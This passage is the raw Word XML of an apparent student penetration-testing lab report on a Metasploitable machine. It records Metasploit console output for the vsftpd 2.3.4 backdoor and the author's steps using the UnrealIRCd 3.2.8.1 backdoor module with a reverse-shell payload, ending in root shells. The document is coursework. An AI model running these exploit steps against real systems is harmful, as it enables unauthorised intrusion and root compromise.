            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>=0(root) gid=0(root).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="38B05867" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] 192.168.1.85:21 - Banner: 220 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>vsFTPd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.3.4)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="603C3FAF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] 192.168.1.85:21 - USER: 331 Please specify the password.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0263F55E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[+] 192.168.1.85:21 - Backdoor service has been spawned, handling...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FC8D3FD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] 192.168.1.85:21 - UID: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>=0(root) gid=0(root)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66797DA2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Found shell.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DD58FD5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Command shell session 1 opened (10.0.2.15:40547 -&gt; 192.168.1.85:6200) at 2024-05-16 12:33:55 -0400         </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="6C34EB75" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2BC240E2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="563FE4AF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4539D832" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5727D732" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E777B9F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability [Second]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE502A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE62715" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Services: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Admin email </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>admin@Metasploitable.LAN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617649F0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11FF58F4" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Your result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C04372D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C5651C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C499A5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="113D401D" wp14:editId="75D15380">
            <wp:extent cx="6120130" cy="3047365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Image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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3047365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C472ACD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A7D53D3" wp14:editId="3505CF72">
            <wp:extent cx="6120130" cy="4253865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Image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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="4253865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5141EED6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AF423C1" wp14:editId="430C66B3">
            <wp:extent cx="6120130" cy="2917190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Image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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2917190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69746507" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DCCB4B9" wp14:editId="413DF2ED">
            <wp:extent cx="6120130" cy="4709795"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Image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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="4709795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31549CDA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="161232D6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9450" w:type="dxa"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2953"/>
        <w:gridCol w:w="6497"/>
      </w:tblGrid>
      <w:tr w:rsidR="00970F89" w14:paraId="2069BDA5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5334F4D6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="31A19F51" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Output (services, ports)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="3112AAB1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="139D26E8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Initially, I searched this vulnerability like “search </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>irc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> unreal”, eventually, I got the module “exploit/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>unix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>irc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">/unreal_ircd_3281_backdoor”. Then, I used this module, checked options and the port was the same with my service, also noticed that I don’t have any payloads there and RHOSTS. Following that, I </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>seted</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> RHOST of our victim, chose the payload after checking all possible payload. I chose the “payload/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>unix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">/reverse” reverse shell. Then, I checked again the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>options</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> and I had to set the LHOST of my machine, so that, our victim connect to my machine   to exchange data between each other and control the victim’s machine, depends on privilege. So, I run the exploit and in results I got: “Command shell session 1 opened (192.168.1.96:4444 -&gt; 192.168.1.85:55728) at 2024-05-16 13:56:27 -0400”. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EEA3C18" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Privilege root: “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>=0(root) gid=0(root)”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B1025D5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Started reverse TCP double handler on 192.168.1.96:4444 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4588304C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] 192.168.1.85:6667 - Connected to 192.168.1.85:6667...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14B1BE3C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>irc.Metasploitable.LAN</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> NOTICE AUTH :*** Looking up your hostname...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01DBC97C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] 192.168.1.85:6667 - Sending backdoor command...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67CD4AAC" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Accepted the first client connection...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B6A445" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
